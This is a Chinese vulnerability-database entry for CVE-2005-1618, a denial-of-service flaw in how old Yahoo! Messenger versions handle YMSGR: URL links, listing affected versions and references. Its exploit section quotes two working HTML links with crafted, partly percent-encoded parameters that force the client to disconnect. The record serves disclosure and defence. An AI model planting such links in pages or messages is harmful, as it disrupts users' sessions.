雅虎通URL处理程序远程拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1108778 漏洞类型 其他
发布时间 2005-05-13 更新时间 2007-02-20
CVE编号 CVE-2005-1618 CNNVD-ID CNNVD-200505-1057
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/25658
https://www.securityfocus.com/bid/13626
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-1057
|漏洞详情
雅虎通是一款免费的即时通讯软件。雅虎通处理YMSGR:URL处理程序链接中参数的方式存在拒绝服务漏洞。攻击者可以通过特制的链接向Yahoo!的YMSG服务器发送特制报文。Yahoo!在接收这些报文时会立即断开当前会话。
|漏洞EXP
source: http://www.securityfocus.com/bid/13626/info

Yahoo! Messenger is prone to a denial-of-service vulnerability because the application fails to handle exceptional conditions.

A remote user can cause Yahoo! Messenger to disconnect through malicious emails or web pages.

This issue is reported to affect Yahoo! Messenger versions 5.x to 6.0 Windows; other versions on other operating systems may also be affected. 

<a href="YMSGR:%63%68%61%74%3F:::%26%26%26%26">Click Here</a>
<a href="YMSGR:Chat?:::%26%26%26%26">Click Here</a>
|受影响的产品
Yahoo! Messenger 6.0 .0.1921 Yahoo! Messenger 6.0 .0.1750 Yahoo! Messenger 6.0 .0.1643 Yahoo! Messenger 6.0 Yahoo! Messenger 5.6 .0.1358 Yahoo! Messenger 5.6 .0.1356
|参考资料

来源:BUGTRAQ
名称:20050513Yahoo!MessengerURLHandlerRemoteDoSVulnerability
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=111601904204055&w=2
来源:BID
名称:13626
链接:http://www.securityfocus.com/bid/13626
来源:OSVDB
名称:16816
链接:http://www.osvdb.org/16816